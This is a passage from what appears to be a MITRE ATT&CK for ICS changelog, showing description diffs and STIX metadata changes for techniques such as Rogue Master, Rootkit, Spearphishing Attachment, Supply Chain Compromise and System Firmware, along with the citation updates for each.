 >using many distributed repeaters. (Citation: Bastille April 
 >2017) (Citation: Zack Whittaker April 2017)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:11:21.376000+00:00
descriptionAdversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the Maroochy Attack, Vitek Boden falsified network addresses in order to send false data and instructions to pumping stations. In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters.Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the Maroochy Shire attack, the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008) In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0848https://attack.mitre.org/techniques/T0848
external_references[1]['source_name']Maroochy - MITRE - 200808Bastille April 2017
external_references[1]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06
external_references[1]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://www.bastille.net/blogs/2017/4/17/dallas-siren-attack
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}
external_references{'source_name': 'Zack Whittaker April 2017', 'description': "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0851] Rootkit

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may deploy rootkits to hide the presence of progt1Adversaries may deploy rootkits to hide the presence of prog
>rams, files, network connections, services, drivers, and oth>rams, files, network connections, services, drivers, and oth
>er system components. Rootkits are programs that hide the ex>er system components. Rootkits are programs that hide the ex
>istence of malware by intercepting and modifying operating-s>istence of malware by intercepting and modifying operating-s
>ystem API calls that supply system information. Rootkits or >ystem API calls that supply system information. Rootkits or 
>rootkit-enabling functionality may reside at the user or ker>rootkit-enabling functionality may reside at the user or ker
>nel level in the operating system, or lower. (Citation: EAtt>nel level in the operating system, or lower. (Citation: Ente
>ack Rootkit)   Firmware rootkits that affect the operating s>rprise ATT&CK January 2018)     Firmware rootkits that affec
>ystem yield nearly full control of the system. While firmwar>t the operating system yield nearly full control of the syst
>e rootkits are normally developed for the main processing bo>em. While firmware rootkits are normally developed for the m
>ard, they can also be developed for I/O  that can be attache>ain processing board, they can also be developed for the I/O
>d to the asset. Compromise of this firmware allows the modif> that is attached to an asset. Compromise of this firmware a
>ication of all of the process variables and functions the mo>llows the modification of all of the process variables and f
>dule engages in. This may result in commands being disregard>unctions the module engages in. This may result in commands 
>ed and false information being fed to the main device. By ta>being disregarded and false information being fed to the mai
>mpering with device processes, an adversary may inhibit its >n device. By tampering with device processes, an adversary m
>expected response functions and possibly enable Impact.  Det>ay inhibit its expected response functions and possibly enab
>ection: Some rootkit protections may be built into anti-viru>le [Impact](https://attack.mitre.org/tactics/TA0105).
>s or operating system software. There are dedicated rootkit  
>detection tools that look for specific types of rootkit beha 
>vior. Monitor for the existence of unrecognized DLLs, device 
>s, services, and changes to the MBR.Reference - Rootkit 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 20:44:34.980000+00:00
descriptionAdversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: EAttack Rootkit) Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for I/O that can be attached to the asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable Impact. Detection: Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR.Reference - RootkitAdversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0851https://attack.mitre.org/techniques/T0851
external_references[1]['source_name']EAttack RootkitEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). Rootkit. Retrieved May 16, 2018.Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16

[T0865] Spearphishing Attachment

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may use a spearphishing attachment, a variant oft1Adversaries may use a spearphishing attachment, a variant of
> spearphishing, as a form of a social engineering attack aga> spearphishing, as a form of a social engineering attack aga
>inst specific targets. Spearphishing attachments are differe>inst specific targets. Spearphishing attachments are differe
>nt from other forms of spearphishing in that they employ mal>nt from other forms of spearphishing in that they employ mal
>ware attached to an email. All forms of spearphishing are el>ware attached to an email. All forms of spearphishing are el
>ectronically delivered and target a specific individual, com>ectronically delivered and target a specific individual, com
>pany, or industry. In this scenario, adversaries attach a fi>pany, or industry. In this scenario, adversaries attach a fi
>le to the spearphishing email and usually rely upon User Exe>le to the spearphishing email and usually rely upon [User Ex
>cution to gain execution and access. (Citation: EAttack Spea>ecution](https://attack.mitre.org/techniques/T0863) to gain 
>rphishing Attachment) A Chinese spearphishing campaign runni>execution and access. (Citation: Enterprise ATT&CK October 2
>ng from December 9, 2011 through February 29, 2012, targeted>019)   A Chinese spearphishing campaign running from Decembe
> ONG organizations and their employees. The emails were cons>r 9, 2011 through February 29, 2012, targeted ONG organizati
>tructed with a high level of sophistication to convince empl>ons and their employees. The emails were constructed with a 
>oyees to open the malicious file attachments.(Citation: CISA>high level of sophistication to convince employees to open t
> Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)>he malicious file attachments. (Citation: CISA AA21-201A Pip
 >eline Intrusion July 2021)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-27 15:22:37.964000+00:00
descriptionAdversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access. (Citation: EAttack Spearphishing Attachment) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments.(Citation: CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021)Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) A Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0865https://attack.mitre.org/techniques/T0865
external_references[1]['source_name']EAttack Spearphishing AttachmentCISA AA21-201A Pipeline Intrusion July 2021
external_references[1]['description']Enterprise ATT&CK. (2019, October 25). Spearphishing Attachment. Retrieved October 25, 2019.Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08
external_references[1]['url']https://attack.mitre.org/techniques/T1193/https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf
external_references[2]['source_name']CISA Chinese Gas Pipeline Intrusion 2011 - 2013 July 2021Enterprise ATT&CK October 2019
external_references[2]['description']ONG2011 - DHS Advisory - Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA). (2021, July 20). Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013. Retrieved October 8, 2021.Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25
external_references[2]['url']https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdfhttps://attack.mitre.org/techniques/T1193/

[T0856] Spoof Reporting Message

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may spoof reporting messages in control systems t1Adversaries may spoof reporting messages in control system e
>environments to achieve evasion and assist with impairment o>nvironments for evasion and to impair process control. In co
>f process controls. Reporting messages are used in control s>ntrol systems, reporting messages contain telemetry data (e.
>ystems so that operators and network defenders can understan>g., I/O values) pertaining to the current state of equipment
>d the status of the network. Reporting messages show the sta> and the industrial process. Reporting messages are importan
>tus of devices and any important events that the devices con>t for monitoring the normal operation of a system or identif
>trol.    If an adversary has the ability to Spoof Reporting >ying important events such as deviations from expected value
>Messages, then they can impact the network in many ways. The>s.   If an adversary has the ability to Spoof Reporting Mess
> adversary can Spoof Reporting Messages that state that the >ages, they can impact the control system in many ways. The a
>device is in normal working condition, as a form of evasion.>dversary can Spoof Reporting Messages that state that the pr
> The adversary could also Spoof Reporting Messages to make t>ocess is operating normally, as a form of evasion. The adver
>he defenders and operators think that other errors were occu>sary could also Spoof Reporting Messages to make the defende
>rring, to distract them from the actual source of the proble>rs and operators think that other errors are occurring in or
>m. (Citation: Research - Research - Taxonomy Cyber Attacks o>der to distract them from the actual source of a problem. (C
>n SCADA)  In the Maroochy Attack, the adversary used a dedic>itation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)   
>ated analog two-way radio system to send false data and inst>In the Maroochy Shire attack, the adversary used a dedicated
>ructions to pumping stations and the central computer. (Cita> analog two-way radio system to send false data and instruct
>tion: Maroochy - MITRE - 200808)>ions to pumping stations and the central computer.(Citation:
 > Marshall Abrams July 2008)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:16:21.548000+00:00
descriptionAdversaries may spoof reporting messages in control systems environments to achieve evasion and assist with impairment of process controls. Reporting messages are used in control systems so that operators and network defenders can understand the status of the network. Reporting messages show the status of devices and any important events that the devices control. If an adversary has the ability to Spoof Reporting Messages, then they can impact the network in many ways. The adversary can Spoof Reporting Messages that state that the device is in normal working condition, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors were occurring, to distract them from the actual source of the problem. (Citation: Research - Research - Taxonomy Cyber Attacks on SCADA) In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. (Citation: Maroochy - MITRE - 200808)Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0856https://attack.mitre.org/techniques/T0856
external_references[1]['source_name']Research - Research - Taxonomy Cyber Attacks on SCADABonnie Zhu, Anthony Joseph, Shankar Sastry 2011
external_references[1]['description']Bonnie Zhu, Anthony Joseph, Shankar Sastry. (2011). A Taxonomy of Cyber Attacks on SCADA Systems. Retrieved January 12, 2018.Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12
external_references[2]['source_name']Maroochy - MITRE - 200808Marshall Abrams July 2008
external_references[2]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[2]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

[T0862] Supply Chain Compromise

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may perform supply chain compromise to gain contt1Adversaries may perform supply chain compromise to gain cont
>rol systems environment access by means of infected products>rol systems environment access by means of infected products
>, software, and workflows. Supply chain compromise is the ma>, software, and workflows. Supply chain compromise is the ma
>nipulation of products, such as devices or software, or thei>nipulation of products, such as devices or software, or thei
>r delivery mechanisms before receipt by the end consumer. Ad>r delivery mechanisms before receipt by the end consumer. Ad
>versary compromise of these products and mechanisms is done >versary compromise of these products and mechanisms is done 
>for the goal of data or system compromise, once infected pro>for the goal of data or system compromise, once infected pro
>ducts are introduced to the target environment.   Supply cha>ducts are introduced to the target environment.   Supply cha
>in compromise can occur at all stages of the supply chain, f>in compromise can occur at all stages of the supply chain, f
>rom manipulation of development tools and environments to ma>rom manipulation of development tools and environments to ma
>nipulation of developed products and tools distribution mech>nipulation of developed products and tools distribution mech
>anisms. This may involve the compromise and replacement of l>anisms. This may involve the compromise and replacement of l
>egitimate software and patches, such as on third party or ve>egitimate software and patches, such as on third party or ve
>ndor websites. Targeting of supply chain compromise can be d>ndor websites. Targeting of supply chain compromise can be d
>one in attempts to infiltrate the environments of a specific>one in attempts to infiltrate the environments of a specific
> audience. In control systems environments with assets in bo> audience. In control systems environments with assets in bo
>th the IT and OT networks, it is possible a supply chain com>th the IT and OT networks, it is possible a supply chain com
>promise affecting the IT environment could enable further ac>promise affecting the IT environment could enable further ac
>cess to the OT environment. Counterfeit devices may be intro>cess to the OT environment.     Counterfeit devices may be i
>duced to the global supply chain posing safety and cyber ris>ntroduced to the global supply chain posing safety and cyber
>ks to asset owners and operators. These devices may not meet> risks to asset owners and operators. These devices may not 
> the safety, engineering and manufacturing requirements of r>meet the safety, engineering and manufacturing requirements 
>egulatory bodies but may feature tagging indicating conforma>of regulatory bodies but may feature tagging indicating conf
>nce with industry standards. Due to the lack of adherence to>ormance with industry standards. Due to the lack of adherenc
> standards and overall lesser quality, the counterfeit produ>e to standards and overall lesser quality, the counterfeit p
>cts may pose a serious safety and operational risk. Yokogawa>roducts may pose a serious safety and operational risk. (Cit
> identified instances in which their customers received coun>ation: Control Global May 2019)   Yokogawa identified instan
>terfeit differential pressure transmitters using the Yokogaw>ces in which their customers received counterfeit differenti
>a logo. The counterfeit transmitters were nearly indistingui>al pressure transmitters using the Yokogawa logo. The counte
>shable with a semblance of functionality and interface that >rfeit transmitters were nearly indistinguishable with a semb
>mimics the genuine product.  F-Secure Labs analyzed the appr>lance of functionality and interface that mimics the genuine
>oach the adversary used to compromise victim systems with Ha> product. (Citation: Control Global May 2019)   F-Secure Lab
>vex. (Citation:  (Citation: Havex - F-Secure) - 201406) The >s analyzed the approach the adversary used to compromise vic
>adversary planted trojanized software installers available o>tim systems with Havex. (Citation: Daavid Hentunen, Antti Ti
>n legitimate ICS/SCADA vendor websites. After being download>kkanen June 2014) The adversary planted trojanized software 
>ed, this software infected the host computer with a Remote A>installers available on legitimate ICS/SCADA vendor websites
>ccess Trojan (RAT).>. After being downloaded, this software infected the host co
 >mputer with a Remote Access Trojan (RAT).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-11 16:22:12.527000+00:002022-09-27 15:25:50.699000+00:00
descriptionAdversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. Counterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. Yokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: (Citation: Havex - F-Secure) - 201406) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. Counterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) Yokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0862https://attack.mitre.org/techniques/T0862
external_references[1]['source_name']Control Global Yokogawa May 2019Control Global May 2019
external_references[1]['description']Control Global. (2019, May 29). Yokogawa announcement warns of counterfeit transmitters. Retrieved April 9, 2021.Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09
external_references[2]['source_name']Havex - F-Secure - 201406Daavid Hentunen, Antti Tikkanen June 2014
external_references[2]['description']F-Secure Labs. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved October 21, 2019.Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Havex - F-Secure', 'description': 'Daavid Hentunen, Antti Tikkanen. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved April 1, 2019.', 'url': 'https://www.f-secure.com/weblog/archives/00002718.html'}

[T0857] System Firmware

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1System firmware on modern assets is often designed with an ut1System firmware on modern assets is often designed with an u
>pdate feature. Older device firmware may be factory installe>pdate feature. Older device firmware may be factory installe
>d and require special reprograming equipment. When available>d and require special reprograming equipment. When available
>, the firmware update feature enables vendors to remotely pa>, the firmware update feature enables vendors to remotely pa
>tch bugs and perform upgrades. Device firmware updates are o>tch bugs and perform upgrades. Device firmware updates are o
>ften delegated to the user and may be done using a software >ften delegated to the user and may be done using a software 
>update package. It may also be possible to perform this task>update package. It may also be possible to perform this task
> over the network. An adversary may exploit the firmware upd> over the network.   An adversary may exploit the firmware u
>ate feature on accessible devices to upload malicious or out>pdate feature on accessible devices to upload malicious or o
>-of-date firmware. Malicious modification of device firmware>ut-of-date firmware. Malicious modification of device firmwa
> may provide an adversary with root access to a device, give>re may provide an adversary with root access to a device, gi
>n firmware is one of the lowest programming abstraction laye>ven firmware is one of the lowest programming abstraction la
>rs.(Citation: Research - Firmware Modification)>yers. (Citation: Basnight, Zachry, et al.)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-26 17:14:52.590000+00:00
descriptionSystem firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers.(Citation: Research - Firmware Modification)System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0857https://attack.mitre.org/techniques/T0857
external_references[1]['source_name']Research - Firmware ModificationBasnight, Zachry, et al.
external_references[1]['description']Basnight, Zachry, et al.. (n.d.). Retrieved October 17, 2017.Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Ukraine15 - EISAC - 201603', 'description': 'Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.', 'url': 'https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdf'}

[T0864] Transient Cyber Asset

Current version: 1.1

Version changed from: 0.0 → 1.1


Old Description
New Description
t1Adversaries may target devices that are transient across ICSt1Adversaries may target devices that are transient across ICS
> networks and external networks. Normally, transient assets > networks and external networks. Normally, transient assets 
>are brought into an environment by authorized personnel and >are brought into an environment by authorized personnel and 
>do not remain in that environment on a permanent basis. (Cit>do not remain in that environment on a permanent basis. (Cit
>ation: NERC June 2021) Transient assets are commonly needed >ation: North American Electric Reliability Corporation June 
>to support management functions and may be more common in sy>2021) Transient assets are commonly needed to support manage
>stems where a remotely managed asset is not feasible, extern>ment functions and may be more common in systems where a rem
>al connections for remote access do not exist, or 3rd party >otely managed asset is not feasible, external connections fo
>contractor/vendor access is required.  Adversaries may take >r remote access do not exist, or 3rd party contractor/vendor
>advantage of transient assets in different ways. For instanc> access is required.   Adversaries may take advantage of tra
>e, adversaries may target a transient asset when it is conne>nsient assets in different ways. For instance, adversaries m
>cted to an external network and then leverage its trusted ac>ay target a transient asset when it is connected to an exter
>cess in another environment to launch an attack. They may al>nal network and then leverage its trusted access in another 
>so take advantage of installed applications and libraries th>environment to launch an attack. They may also take advantag
>at are used by legitimate end-users to interact with control>e of installed applications and libraries that are used by l
> system devices.  Transient assets, in some cases, may not b>egitimate end-users to interact with control system devices.
>e deployed with a secure configuration leading to weaknesses>   Transient assets, in some cases, may not be deployed with
> that could allow an adversary to propagate malicious execut> a secure configuration leading to weaknesses that could all
>able code, e.g., the transient asset may be infected by malw>ow an adversary to propagate malicious executable code, e.g.
>are and when connected to an ICS environment the malware pro>, the transient asset may be infected by malware and when co
>pagates onto other systems.  In the Maroochy attack, the adv>nnected to an ICS environment the malware propagates onto ot
>ersary utilized a computer, possibly stolen, with proprietar>her systems.   In the Maroochy Shire attack, the adversary u
>y engineering software to communicate with a wastewater syst>tilized a computer, possibly stolen, with proprietary engine
>em. (Citation: Maroochy - MITRE - 200808)>ering software to communicate with a wastewater system.(Cita
 >tion: Marshall Abrams July 2008)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sources['Network Traffic: Network Flows', 'Network Traffic: Network Connections', 'Assets: Asset Inventory']
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-10-20 18:13:19.252000+00:00
descriptionAdversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: NERC June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system. (Citation: Maroochy - MITRE - 200808)Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more 